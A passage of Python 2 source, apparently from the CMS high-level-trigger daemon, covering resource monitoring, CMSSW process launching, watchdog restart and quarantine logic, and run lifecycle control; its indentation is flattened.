edata,etime,lastStatus = boxinfoFUMap[key]
except:continue #deleted?
if current_time - etime > 10 or edata == None: continue
try:
try:
if edata['version']!=self.boxdoc_version: continue
except: continue
lastrun = edata['activeRuns'][-1]
if lastrun==lastFUrun:
qlumis = int(edata['activeRunNumQueuedLS'])
if qlumis>activeRunQueuedLumisNum:activeRunQueuedLumisNum=qlumis
maxcmsswls = int(edata['activeRunCMSSWMaxLS'])
if maxcmsswls>activeRunCMSSWMaxLumi:activeRunCMSSWMaxLumi=maxcmsswls
except:pass
res_doc = {
"active_resources":active_res,
"active_resources_activeRun":resource_count_activeRun,
#"active_resources":resource_count_activeRun,
"idle":resource_count_idle,
"used":resource_count_used,
"broken":resource_count_broken,
"quarantined":resource_count_quarantined,
"stale_resources":resource_count_stale,
"cloud":cloud_count,
"pending_resources":resource_count_pending,
"activeFURun":lastFUrun,
"activeRunNumQueuedLS":activeRunQueuedLumisNum,
"activeRunCMSSWMaxLS":activeRunCMSSWMaxLumi,
"ramdisk_occupancy":ramdisk_occ,
"fuDiskspaceAlarm":fu_data_alarm
}
with open(res_path_temp,'w') as fp:
json.dump(res_doc,fp,indent=True)
os.rename(res_path_temp,res_path)
res_doc['fm_date']=tstring
try:boxInfo.ec.injectSummaryJson(res_doc)
except:pass
for mfile in self.file:
if conf.role == 'fu':
#check if stale file handle (or slow access)
if not conf.mount_control_path:
self.runStatNFS()
if fu_watchdir_is_mountpoint:
dirstat = os.statvfs(conf.watch_directory)
d_used = ((dirstat.f_blocks - dirstat.f_bavail)*dirstat.f_bsize)>>20,
d_total = (dirstat.f_blocks*dirstat.f_bsize)>>20,
else:
p = subprocess.Popen("du -s --exclude " + ES_DIR_NAME + " --exclude mon --exclude open " + str(conf.watch_directory), shell=True, stdout=subprocess.PIPE)
p.wait()
std_out=p.stdout.read()
out = std_out.split('\t')[0]
d_used = int(out)>>10
d_total = conf.max_local_disk_usage
lastrun = runList.getLastRun()
n_used_activeRun=0
n_broken_activeRun=0
try:
#if cloud_mode==True and entering_cloud_mode==True:
# n_idles = 0
# n_used = 0
# n_broken = 0
# n_cloud = len(os.listdir(cloud))+len(os.listdir(idles))+len(os.listdir(used))+len(os.listdir(broken))
#else:
usedlist = os.listdir(used)
brokenlist = os.listdir(broken)
if lastrun:
try:
n_used_activeRun = lastrun.countOwnedResourcesFrom(usedlist)
n_broken_activeRun = lastrun.countOwnedResourcesFrom(brokenlist)
except:pass
n_idles = len(os.listdir(idles))
n_used = len(usedlist)
n_broken = len(brokenlist)
n_cloud = len(os.listdir(cloud))
global num_excluded
n_quarantined = len(os.listdir(quarantined))-num_excluded
if n_quarantined<0: n_quarantined=0
numQueuedLumis,maxCMSSWLumi=self.getLumiQueueStat()
cloud_state = "off"
if cloud_mode:
if entering_cloud_mode: cloud_state="starting"
elif exiting_cloud_mode:cloud_state="stopping"
else: cloud_state="on"
elif resources_blocked_flag:
cloud_state = "resourcesReleased"
elif masked_resources:
cloud_state = "resourcesMasked"
else:
cloud_state = "off"
boxdoc = {
'fm_date':tstring,
'idles' : n_idles,
'used' : n_used,
'broken' : n_broken,
'used_activeRun' : n_used_activeRun,
'broken_activeRun' : n_broken_activeRun,
'cloud' : n_cloud,
'quarantined' : n_quarantined,
'usedDataDir' : d_used,
'totalDataDir' : d_total,
'fuDataAlarm' : d_used > 0.9*d_total,
'activeRuns' : runList.getActiveRunNumbers(),
'activeRunNumQueuedLS':numQueuedLumis,
'activeRunCMSSWMaxLS':maxCMSSWLumi,
'activeRunStats':runList.getStateDoc(),
'cloudState':cloud_state,
'detectedStaleHandle':self.stale_flag,
'version':self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
boxinfo_update_attempts=0
except (IOError,OSError) as ex:
logger.warning('boxinfo file write failed :'+str(ex))
#detecting stale file handle on recreated loop fs and remount
if conf.instance!='main' and (ex.errno==116 or ex.errno==2) and boxinfo_update_attempts>=5:
boxinfo_update_attempts=0
try:os.unlink(os.path.join(conf.watch_directory,'suspend0'))
except:pass
with open(os.path.join(conf.watch_directory,'suspend0'),'w'):
pass
time.sleep(1)
boxinfo_update_attempts+=1
except Exception as ex:
logger.warning('exception on boxinfo file write failed : +'+str(ex))
if conf.role == 'bu':
outdir = os.statvfs('/fff/output')
boxdoc = {
'fm_date':tstring,
'usedRamdisk':((ramdisk.f_blocks - ramdisk.f_bavail)*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'totalRamdisk':(ramdisk.f_blocks*ramdisk.f_bsize - ramdisk_submount_size)>>20,
'usedOutput':((outdir.f_blocks - outdir.f_bavail)*outdir.f_bsize)>>20,
'totalOutput':(outdir.f_blocks*outdir.f_bsize)>>20,
'activeRuns':runList.getActiveRunNumbers(),
"version":self.boxdoc_version
}
with open(mfile,'w+') as fp:
json.dump(boxdoc,fp,indent=True)
except Exception as ex:
logger.exception(ex)
for mfile in self.file:
try:
os.remove(mfile)
except OSError:
pass
logger.debug('exiting system monitor thread ')
def getLumiQueueStat(self):
try:
with open(os.path.join(conf.watch_directory,'run'+str(runList.getLastRun().runnumber).zfill(conf.run_number_padding),
'open','queue_status.jsn'),'r') as fp:
#fcntl.flock(fp, fcntl.LOCK_EX)
statusDoc = json.load(fp)
return str(statusDoc["numQueuedLS"]),str(statusDoc["CMSSWMaxLS"])
except:
return "-1","-1"
def stop(self):
logger.debug("system_monitor: request to stop")
self.running = False
self.threadEvent.set()
self.threadEventStat.set()
if self.statThread:
self.statThread.join()
class BUEmu:
def __init__(self):
self.process=None
self.runnumber = None
def startNewRun(self,nr):
if self.runnumber:
logger.error("Another BU emulator run "+str(self.runnumber)+" is already ongoing")
return
self.runnumber = nr
configtouse = conf.test_bu_config
destination_base = None
if role == 'fu':
destination_base = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
else:
destination_base = conf.watch_directory
if "_patch" in conf.cmssw_default_version:
full_release="cmssw-patch"
else:
full_release="cmssw"
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
conf.cmssw_arch,
conf.cmssw_default_version,
conf.exec_directory,
full_release,
'null',
configtouse,
str(nr),
'/tmp', #input dir is not needed
destination_base,
'1',
'1']
try:
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
except Exception as ex:
logger.error("Error in forking BU emulator process")
logger.error(ex)
def stop(self):
os.kill(self.process.pid,SIGINT)
self.process.wait()
self.runnumber=None
bu_emulator=BUEmu()
class OnlineResource:
def __init__(self,parent,resourcenames,lock):
self.parent = parent
self.hoststate = 0 #@@MO what is this used for?
self.cpu = resourcenames
self.process = None
self.processstate = None
self.watchdog = None
self.runnumber = None
self.assigned_run_dir = None
self.lock = lock
self.retry_attempts = 0
self.quarantined = []
def ping(self):
if conf.role == 'bu':
if not os.system("ping -c 1 "+self.cpu[0])==0: pass #self.hoststate = 0
def NotifyNewRunStart(self,runnumber):
self.runnumber = runnumber
self.notifyNewRunThread = threading.Thread(target = self.NotifyNewRun,args=[runnumber])
self.notifyNewRunThread.start()
def NotifyNewRunJoin(self):
self.notifyNewRunThread.join()
self.notifyNewRunThread=None
def NotifyNewRun(self,runnumber):
self.runnumber = runnumber
logger.info("calling start of run on "+self.cpu[0])
attemptsLeft=3
while attemptsLeft>0:
attemptsLeft-=1
try:
connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - conf.cgi_instance_port_offset,timeout=10)
connection.request("GET",'cgi-bin/start_cgi.py?run='+str(runnumber))
response = connection.getresponse()
#do something intelligent with the response code
logger.error("response was "+str(response.status))
if response.status > 300: self.hoststate = 1
else:
logger.info(response.read())
break
except Exception as ex:
if attemptsLeft>0:
logger.error(str(ex))
logger.info('retrying connection to '+str(self.cpu[0]))
else:
logger.error('Exhausted attempts to contact '+str(self.cpu[0]))
logger.exception(ex)
def NotifyShutdown(self):
try:
connection = httplib.HTTPConnection(self.cpu[0], conf.cgi_port - self.cgi_instance_port_offset,timeout=5)
connection.request("GET",'cgi-bin/stop_cgi.py?run='+str(self.runnumber))
time.sleep(0.05)
response = connection.getresponse()
time.sleep(0.05)
#do something intelligent with the response code
#if response.status > 300: self.hoststate = 0
except Exception as ex:
logger.exception(ex)
def StartNewProcess(self ,runnumber, startindex, arch, version, menu,transfermode,num_threads,num_streams):
logger.debug("OnlineResource: StartNewProcess called")
self.runnumber = runnumber
"""
this is just a trick to be able to use two
independent mounts of the BU - it should not be necessary in due course
IFF it is necessary, it should address "any" number of mounts, not just 2
"""
input_disk = bu_disk_list_ramdisk_instance[startindex%len(bu_disk_list_ramdisk_instance)]
inputdirpath = os.path.join(input_disk,'run'+str(runnumber).zfill(conf.run_number_padding))
#run_dir = input_disk + '/run' + str(self.runnumber).zfill(conf.run_number_padding)
logger.info("starting process with "+version+" and run number "+str(runnumber)+ ' threads:'+str(num_threads)+' streams:'+str(num_streams))
if "_patch" in version:
full_release="cmssw-patch"
else:
full_release="cmssw"
if not conf.dqm_machine:
new_run_args = [conf.cmssw_script_location+'/startRun.sh',
conf.cmssw_base,
arch,
version,
conf.exec_directory,
full_release,
menu,
transfermode,
str(runnumber),
input_disk,
conf.watch_directory,
str(num_threads),
str(num_streams)]
else: # a dqm machine
dqm_globalrun_file = input_disk + '/' + dqm_globalrun_filepattern.format(str(runnumber).zfill(conf.run_number_padding))
runkey = ''
try:
with open(dqm_globalrun_file, 'r') as f:
for line in f:
runkey = re.search(r'\s*run_key\s*=\s*([0-9A-Za-z_]*)', line, re.I)
if runkey:
runkey = runkey.group(1).lower()
break
except IOError,ex:
logging.exception(ex)
logging.info("the default run key will be used for the dqm jobs")
new_run_args = [conf.cmssw_script_location+'/startDqmRun.sh',
conf.cmssw_base,
arch,
conf.exec_directory,
str(runnumber),
input_disk,
used+self.cpu[0]]
if self.watchdog:
new_run_args.append('skipFirstLumis=True')
if runkey:
new_run_args.append('runkey={0}'.format(runkey))
else:
logging.info('Not able to determine the DQM run key from the "global" file. Default value from the input source will be used.')
try:
# dem = demote.demote(conf.user)
self.process = subprocess.Popen(new_run_args,
preexec_fn=preexec_function,
close_fds=True
)
logger.info("arg array "+str(new_run_args).translate(None, "'")+' started with pid '+str(self.process.pid))
# time.sleep(1.)
if self.watchdog==None:
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
logger.debug("watchdog thread for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
else:
#release lock while joining thread to let it complete
resource_lock.release()
self.watchdog.join()
resource_lock.acquire()
self.processstate = 100
self.watchdog = ProcessWatchdog(self,self.lock,inputdirpath)
self.watchdog.start()
logger.debug("watchdog thread restarted for "+str(self.process.pid)+" is alive "
+ str(self.watchdog.is_alive()))
except Exception as ex:
logger.info("OnlineResource: exception encountered in forking hlt slave")
logger.info(ex)
def join(self):
logger.debug('calling join on thread ' +self.watchdog.name)
self.watchdog.join()
def clearQuarantined(self,doLock=True,restore=True):
global q_list
retq=[]
if not restore:
q_list+=self.quarantined
return self.quarantined
if doLock:resource_lock.acquire()
try:
for cpu in self.quarantined:
logger.info('Clearing quarantined resource '+cpu)
os.rename(quarantined+cpu,idles+cpu)
retq.append(cpu)
self.quarantined = []
self.parent.n_used=0
self.parent.n_quarantined=0
except Exception as ex:
logger.exception(ex)
if doLock:resource_lock.release()
return retq
class ProcessWatchdog(threading.Thread):
def __init__(self,resource,lock,inputdirpath):
threading.Thread.__init__(self)
self.resource = resource
self.lock = lock
self.inputdirpath=inputdirpath
self.retry_limit = conf.process_restart_limit
self.retry_delay = conf.process_restart_delay_sec
self.quarantined = False
def run(self):
try:
logger.info('watchdog thread for process '+str(self.resource.process.pid) + ' on resource '+str(self.resource.cpu)+" for run "+str(self.resource.runnumber) + ' started ')
self.resource.process.wait()
returncode = self.resource.process.returncode
pid = self.resource.process.pid
#update json process monitoring file
self.resource.processstate=returncode
outdir = self.resource.assigned_run_dir
abortedmarker = os.path.join(outdir,Run.ABORTED)
stoppingmarker = os.path.join(outdir,Run.STOPPING)
abortcompletemarker = os.path.join(outdir,Run.ABORTCOMPLETE)
completemarker = os.path.join(outdir,Run.COMPLETE)
rnsuffix = str(self.resource.runnumber).zfill(conf.run_number_padding)
if os.path.exists(abortedmarker):
resource_lock.acquire()
#release resources
try:
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
self.resource.parent.n_used-=1
except Exception as ex:
logger.exception(ex)
except:pass
resource_lock.release()
return
#input dir check if cmsRun can not find the input
inputdir_exists = os.path.exists(self.inputdirpath)
configuration_reachable = False if conf.dqm_machine==False and returncode==90 and not inputdir_exists else True
if conf.dqm_machine==False and returncode==90 and inputdir_exists:
if not os.path.exists(os.path.join(self.inputdirpath,'hlt','HltConfig.py')):
logger.error("input run dir exists, but " + str(os.path.join(self.inputdirpath,'hlt','HltConfig.py')) + " is not present (cmsRun exit code 90)")
configuration_reachable=False
#cleanup actions- remove process from list and attempt restart on same resource
if returncode != 0 and returncode!=None and configuration_reachable:
#bump error count in active_runs_errors which is logged in the box file
self.resource.parent.num_errors+=1
if returncode < 0:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with signal "
+str(returncode) + ', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
else:
logger.error("process "+str(pid)
+" for run "+str(self.resource.runnumber)
+" on resource(s) " + str(self.resource.cpu)
+" exited with code "
+str(returncode) +', retries left: '+str(self.retry_limit-self.resource.retry_attempts)
)
#quit codes (configuration errors):
quit_codes = [127,90,73]
#removed 65 because it is not only configuration error
#quit_codes = [127,90,65,73]
#dqm mode will treat configuration error as a crash and eventually move to quarantined
if conf.dqm_machine==False and returncode in quit_codes:
if self.resource.retry_attempts < self.retry_limit:
logger.warning('for this type of error, restarting this process is disabled')
self.resource.retry_attempts=self.retry_limit
if returncode==127:
logger.fatal('Exit code indicates that CMSSW environment might not be available (cmsRun executable not in path).')
elif returncode==90:
logger.fatal('Exit code indicates that there might be a python error in the CMSSW configuration.')
else:
logger.fatal('Exit code indicates that there might be a C/C++ error in the CMSSW configuration.')
#generate crashed pid json file like: run000001_ls0000_crash_pid12345.jsn
oldpid = "pid"+str(pid).zfill(5)
runnumber = "run"+str(self.resource.runnumber).zfill(conf.run_number_padding)
ls = "ls0000"
filename = "_".join([runnumber,ls,"crash",oldpid])+".jsn"
filepath = os.path.join(outdir,filename)
document = {"errorCode":returncode}
try:
with open(filepath,"w+") as fi:
json.dump(document,fi)
except: logger.exception("unable to create %r" %filename)
logger.info("pid crash file: %r" %filename)
if self.resource.retry_attempts < self.retry_limit:
"""
sleep a configurable amount of seconds before
trying a restart. This is to avoid 'crash storms'
"""
time.sleep(self.retry_delay)
self.resource.process = None
self.resource.retry_attempts += 1
logger.info("try to restart process for resource(s) "
+str(self.resource.cpu)
+" attempt "
+ str(self.resource.retry_attempts))
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,broken+cpu)
self.resource.parent.n_used-=1
resource_lock.release()
logger.debug("resource(s) " +str(self.resource.cpu)+
" successfully moved to except")
elif self.resource.retry_attempts >= self.retry_limit:
logger.info("process for run "
+str(self.resource.runnumber)
+" on resources " + str(self.resource.cpu)
+" reached max retry limit "
)
resource_lock.acquire()
for cpu in self.resource.cpu:
os.rename(used+cpu,quarantined+cpu)
self.resource.quarantined.append(cpu)
self.resource.parent.n_quarantined+=1
resource_lock.release()
self.quarantined=True
#write quarantined marker for RunRanger
try:
os.remove(conf.watch_directory+'/quarantined'+rnsuffix)
except:
pass
try:
with open(conf.watch_directory+'/quarantined'+rnsuffix,'w+') as fp:
pass
except Exception as ex:
logger.exception(ex)
#successful end= release resource (TODO:maybe should mark aborted for non-0 error codes)
elif returncode == 0 or returncode == None or not configuration_reachable:
if not configuration_reachable:
logger.info('pid '+str(pid)+' exit 90 (input directory and menu missing) from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
else:
logger.info('pid '+str(pid)+' exit 0 from run ' + str(self.resource.runnumber) + ' - releasing resource ' + str(self.resource.cpu))
# generate an end-of-run marker if it isn't already there - it will be picked up by the RunRanger
endmarker = conf.watch_directory+'/end'+rnsuffix
if not os.path.exists(endmarker):
with open(endmarker,'w+') as fp:
pass
count=0
# wait until the request to end has been handled
while not os.path.exists(stoppingmarker):
if os.path.exists(completemarker):
break
if os.path.exists(abortedmarker) or os.path.exists(abortcompletemarker):
logger.warning('quitting watchdog thread because run ' + str(self.resource.runnumber) + ' has been aborted ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
if not os.path.exists(outdir):
logger.warning('quitting watchdog thread because run directory ' + outdir + ' has disappeared ( pid' + str(pid) + ' resource' + str(self.resource.cpu) + ')')
break
time.sleep(.1)
count+=1
if count>=100 and count%100==0:
logger.warning("still waiting for complete marker for run "+str(self.resource.runnumber) + ' in watchdog for resource '+str(self.resource.cpu))
# move back the resource now that it's safe since the run is marked as ended
resource_lock.acquire()
for cpu in self.resource.cpu:
try:
os.rename(used+cpu,idles+cpu)
except Exception as ex:
logger.warning('problem moving core ' + cpu + ' from used to idle:'+str(ex))
resource_lock.release()
#logger.info('exiting watchdog thread for '+str(self.resource.cpu))
except Exception as ex:
logger.info("OnlineResource watchdog: exception")
logger.exception(ex)
try:resource_lock.release()
except:pass
return
class Run:
STARTING = 'starting'
ACTIVE = 'active'
STOPPING = 'stopping'
ABORTED = 'aborted'
COMPLETE = 'complete'
ABORTCOMPLETE = 'abortcomplete'
VALID_MARKERS = [STARTING,ACTIVE,STOPPING,COMPLETE,ABORTED,ABORTCOMPLETE]
def __init__(self,nr,dirname,bu_dir,instance):
self.pending_shutdown=False
self.is_ongoing_run=True
self.num_errors = 0
self.instance = instance
self.runnumber = nr
self.dirname = dirname
self.online_resource_list = []
self.anelastic_monitor = None
self.elastic_monitor = None
self.elastic_test = None
self.arch = None
self.version = None
self.transfermode = None
self.waitForEndThread = None
self.beginTime = datetime.datetime.now()
self.anelasticWatchdog = None
self.elasticBUWatchdog = None
self.completedChecker = None
self.runShutdown = None
self.threadEvent = threading.Event()
self.stopThreads = False
#stats on usage of resources
self.n_used = 0
self.n_quarantined = 0
self.inputdir_exists = False
if conf.role == 'fu':
self.changeMarkerMaybe(Run.STARTING)
#TODO:raise from runList
# if int(self.runnumber) in active_runs:
# raise Exception("Run "+str(self.runnumber)+ "already active")
self.hlt_directory = os.path.join(bu_dir,conf.menu_directory)
self.menu_path = os.path.join(self.hlt_directory,conf.menu_name)
self.paramfile_path = os.path.join(self.hlt_directory,conf.paramfile_name)
readMenuAttempts=0
#polling for HLT menu directory
def paramsPresent():
return os.path.exists(self.hlt_directory) and os.path.exists(self.menu_path) and os.path.exists(self.paramfile_path)
paramsDetected = False
while conf.dqm_machine==False and conf.role=='fu':
if paramsPresent():
try:
with open(self.paramfile_path,'r') as fp:
fffparams = json.load(fp)
self.arch = fffparams['SCRAM_ARCH']
self.version = fffparams['CMSSW_VERSION']
self.transfermode = fffparams['TRANSFER_MODE']
paramsDetected = True
logger.info("Run " + str(self.runnumber) + " uses " + self.version + " ("+self.arch + ") with " + str(conf.menu_name) + ' transferDest:'+self.transfermode)
break
except ValueError as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
except Exception as ex:
if readMenuAttempts>50:
logger.exception(ex)
break
else:
if readMenuAttempts>50:
if not os.path.exists(bu_dir):
logger.info("FFF parameter or HLT menu files not found in ramdisk - BU run directory is gone")
else:
logger.error("FFF parameter or HLT menu files not found in ramdisk")
break
readMenuAttempts+=1
time.sleep(.1)
continue
if not paramsDetected:
self.arch = conf.cmssw_arch
self.version = conf.cmssw_default_version
self.menu_path = conf.test_hlt_config1
self.transfermode = 'null'
if conf.role=='fu':
logger.warning("Using default values for run " + str(self.runnumber) + ": " + self.version + " (" + self.arch + ") with " + self.menu_path)
#give this command line parameter quoted in case it is empty
if len(self.transfermode)==0:
self.transfermode='null'
#backup HLT menu and parameters
if conf.role=='fu':
try:
hltTargetName = 'HltConfig.py_run'+str(self.runnumber)+'_'+self.arch+'_'+self.version+'_'+self.transfermode
shutil.copy(self.menu_path,os.path.join(conf.log_dir,'pid',hltTargetName))
except:
logger.warning('Unable to backup HLT menu')
self.rawinputdir = None
#
if conf.role == "bu":
try:
self.rawinputdir = conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
os.stat(self.rawinputdir)
self.inputdir_exists = True
except Exception, ex:
logger.error("failed to stat "+self.rawinputdir)
try:
os.mkdir(self.rawinputdir+'/mon')
except Exception, ex:
logger.error("could not create mon dir inside the run input directory")
else:
self.rawinputdir= os.path.join(bu_disk_list_ramdisk_instance[0],'run' + str(self.runnumber).zfill(conf.run_number_padding))
#verify existence of the input directory
if conf.role=='fu':
if not paramsDetected and conf.dqm_machine==False:
try:
os.stat(self.rawinputdir)
self.inputdir_exists = True
except:
logger.warning("unable to stat raw input directory for run "+str(self.runnumber))
return
else:
self.inputdir_exists = True
self.lock = threading.Lock()
if conf.use_elasticsearch == True:
global nsslock
try:
if conf.role == "bu":
nsslock.acquire()
logger.info("starting elasticbu.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elasticbu.py',self.instance,str(self.runnumber)]
else:
logger.info("starting elastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/elastic.py',self.dirname,self.rawinputdir+'/mon',str(expected_processes)]
self.elastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.error("failed to start elasticsearch client")
logger.error(ex)
try:nsslock.release()
except:pass
if conf.role == "fu" and conf.dqm_machine==False:
try:
logger.info("starting anelastic.py with arguments:"+self.dirname)
elastic_args = ['/opt/hltd/python/anelastic.py',self.dirname,str(self.runnumber), self.rawinputdir,bu_disk_list_output_instance[0]]
self.anelastic_monitor = subprocess.Popen(elastic_args,
preexec_fn=preexec_function,
close_fds=True
)
except OSError as ex:
logger.fatal("failed to start anelastic.py client:")
logger.exception(ex)
sys.exit(1)
def __del__(self):
self.stopThreads=True
self.threadEvent.set()
if self.completedChecker:
try:
self.completedChecker.join()
except RuntimeError:
pass
if self.elasticBUWatchdog:
try:
self.elasticBUWatchdog.join()
except RuntimeError:
pass
if self.runShutdown:
self.joinShutdown()
logger.info('Run '+ str(self.runnumber) +' object __del__ has completed')
def countOwnedResourcesFrom(self,resourcelist):
ret = 0
try:
for p in self.online_resource_list:
for c in p.cpu:
for resourcename in resourcelist:
if resourcename == c:
ret+=1
except:pass
return ret
def AcquireResource(self,resourcenames,fromstate):
idles = conf.resource_base+'/'+fromstate+'/'
try:
logger.debug("Trying to acquire resource "
+str(resourcenames)
+" from "+fromstate)
for resourcename in resourcenames:
os.rename(idles+resourcename,used+resourcename)
self.n_used+=1
#TODO:fix core pairing with resource.cpu list (otherwise - restarting will not work properly)
if not filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list):
logger.debug("resource(s) "+str(resourcenames)
+" not found in online_resource_list, creating new")
self.online_resource_list.append(OnlineResource(self,resourcenames,self.lock))
return self.online_resource_list[-1]
logger.debug("resource(s) "+str(resourcenames)
+" found in online_resource_list")
return filter(lambda x: sorted(x.cpu)==sorted(resourcenames),self.online_resource_list)[0]
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.info(ex)
def MatchResource(self,resourcenames):
for res in self.online_resource_list:
#first resource in the list is the one that triggered inotify event
if resourcenames[0] in res.cpu:
found_all = True
for name in res.cpu:
if name not in resourcenames:
found_all = False
if found_all:
return res.cpu
return None
def ContactResource(self,resourcename):
self.online_resource_list.append(OnlineResource(self,resourcename,self.lock))
self.online_resource_list[-1].ping() #@@MO this is not doing anything useful, afaikt
def ReleaseResource(self,res):
self.online_resource_list.remove(res)
def AcquireResources(self,mode):
logger.info("acquiring resources from "+conf.resource_base)
idles = conf.resource_base
idles += '/idle/' if conf.role == 'fu' else '/boxes/'
try:
dirlist = os.listdir(idles)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.info(ex)
logger.info(str(dirlist))
current_time = time.time()
count = 0
cpu_group=[]
#self.lock.acquire()
global machine_blacklist
bldir = os.path.join(self.dirname,'hlt')
blpath = os.path.join(self.dirname,'hlt','blacklist')
if conf.role=='bu':
attempts=100
while not os.path.exists(bldir) and attempts>0:
time.sleep(0.05)
attempts-=1
if attempts<=0:
logger.error('Timeout waiting for directory '+ bldir)
break
if os.path.exists(blpath):
update_success,machine_blacklist=updateBlacklist(blpath)
else:
logger.error("unable to find blacklist file in "+bldir)
for cpu in dirlist:
#skip self
if conf.role=='bu':
if cpu == os.uname()[1]:continue
if cpu in machine_blacklist:
logger.info("skipping blacklisted resource "+str(cpu))
continue
if self.checkStaleResourceFile(idles+cpu):
logger.error("Skipping stale resource "+str(cpu))
continue
count = count+1
try:
age = current_time - os.path.getmtime(idles+cpu)
cpu_group.append(cpu)
if conf.role == 'fu':
if count == nstreams:
self.AcquireResource(cpu_group,'idle')
cpu_group=[]
count=0
else:
logger.info("found resource "+cpu+" which is "+str(age)+" seconds old")
if age < 10:
cpus = [cpu]
self.ContactResource(cpus)
except Exception as ex:
logger.error('encountered exception in acquiring resource '+str(cpu)+':'+str(ex))
return True
#self.lock.release()
def checkStaleResourceFile(self,resourcepath):
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
time.sleep(.05)
try:
with open(resourcepath,'r') as fi:
doc = json.load(fi)
if doc['detectedStaleHandle']==True:
return True
except:
logger.warning('can not parse ' + str(resourcepath))
return False
def CheckTemplate(self):
if conf.role=='bu' and conf.use_elasticsearch:
logger.info("checking ES template")
try:
setupES(forceReplicas=conf.force_replicas)
except Exception as ex:
logger.error("Unable to check run appliance template:"+str(ex))
def Start(self):
self.is_ongoing_run = True
#create mon subdirectory before starting
try:
os.makedirs(os.path.join(self.dirname,'mon'))
except OSError:
pass
#start/notify run for each resource
if conf.role == 'fu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on cpu(s) '+str(resource.cpu))
self.StartOnResource(resource)
if conf.dqm_machine==False:
self.changeMarkerMaybe(Run.ACTIVE)
#start safeguard monitoring of anelastic.py
self.startAnelasticWatchdog()
elif conf.role == 'bu':
for resource in self.online_resource_list:
logger.info('start run '+str(self.runnumber)+' on resources '+str(resource.cpu))
resource.NotifyNewRunStart(self.runnumber)
#update begin time at this point
self.beginTime = datetime.datetime.now()
for resource in self.online_resource_list:
resource.NotifyNewRunJoin()
logger.info('sent start run '+str(self.runnumber)+' notification to all resources')
self.startElasticBUWatchdog()
self.startCompletedChecker()
def maybeNotifyNewRun(self,resourcename,resourceage):
if conf.role=='fu':
logger.fatal('this function should *never* have been called when role == fu')
return
if self.rawinputdir != None:
#TODO:check also for EoR file?
try:
os.stat(self.rawinputdir)
except:
logger.warning('Unable to find raw directory of '+str(self.runnumber))
return None
for resource in self.online_resource_list:
if resourcename in resource.cpu:
logger.error('Resource '+str(resource.cpu)+' was already processing run ' + str(self.runnumber) + '. Will not participate in this run.')
return None
if resourcename in machine_blacklist:
logger.info("skipping blacklisted resource "+str(resource.cpu))
return None
current_time = time.time()
age = current_time - resourceage
logger.info("found resource "+resourcename+" which is "+str(age)+" seconds old")
if age < 10:
self.ContactResource([resourcename])
return self.online_resource_list[-1]
else:
return None
def StartOnResource(self, resource):
logger.debug("StartOnResource called")
resource.assigned_run_dir=conf.watch_directory+'/run'+str(self.runnumber).zfill(conf.run_number_padding)
resource.StartNewProcess(self.runnumber,
self.online_resource_list.index(resource),
self.arch,
self.version,
self.menu_path,
self.transfermode,
int(round((len(resource.cpu)*float(nthreads)/nstreams))),
len(resource.cpu))
logger.debug("StartOnResource process started")
def Stop(self):
#used to gracefully stop CMSSW and finish scripts
with open(os.path.join(self.dirname,"temp_CMSSW_STOP"),'w') as f:
writedoc = {}
bu_lumis = []
try:
bu_eols_files = filter( lambda x: x.endswith("_EoLS.jsn"),os.listdir(self.rawinputdir))
bu_lumis = (sorted([int(x.split('_')[1][2:]) for x in bu_eols_files]))
except:
logger.error("Unable to parse BU EoLS files")
ls_delay=3
if len(bu_lumis):
logger.info('last closed lumisection in ramdisk is '+str(bu_lumis[-1])+', requesting to close at LS '+ str(bu_lumis[-1]+ls_delay))
writedoc['lastLS']=bu_lumis[-1]+ls_delay #current+delay
else: writedoc['lastLS']=ls_delay
json.dump(writedoc,f)
try:
os.rename(os.path.join(self.dirname,"temp_CMSSW_STOP"),os.path.join(self.dirname,"CMSSW_STOP"))
except:pass
def startShutdown(self,killJobs=False,killScripts=False):
self.runShutdown = threading.Thread(target = self.Shutdown,args=[killJobs,killScripts])
self.runShutdown.start()
def joinShutdown(self):
if self.runShutdown:
try:
self.runShutdown.join()
except:
return
def Shutdown(self,killJobs=False,killScripts=False):
#herod mode sends sigkill to all process, however waits for all scripts to finish
logger.info("run"+str(self.runnumber)+": Shutdown called")
self.pending_shutdown=False
self.is_ongoing_run = False
try:
self.changeMarkerMaybe(Run.ABORTED)
except OSError as ex:
pass
time.sleep(.1)
try:
for resource in self.online_resource_list:
if resource.processstate==100:
logger.info('terminating process '+str(resource.process.pid)+
' in state '+str(resource.processstate)+' owning '+str(resource.cpu))
if killJobs:resource.process.kill()
else:resource.process.terminate()
if resource.watchdog!=None and resource.watchdog.is_alive():
try:
resource.join()
except:
pass
logger.info('process '+str(resource.process.pid)+' terminated')
time.sleep(.1)
logger.info(' releasing resource(s) '+str(resource.cpu))
resource_lock.acquire()
q_clear_condition = (not self.checkQuarantinedLimit()) or conf.auto_clear_quarantined
for resource in self.online_resource_list:
cleared_q = resource.clearQuarantined(doLock=False,restore=q_clear_condition)
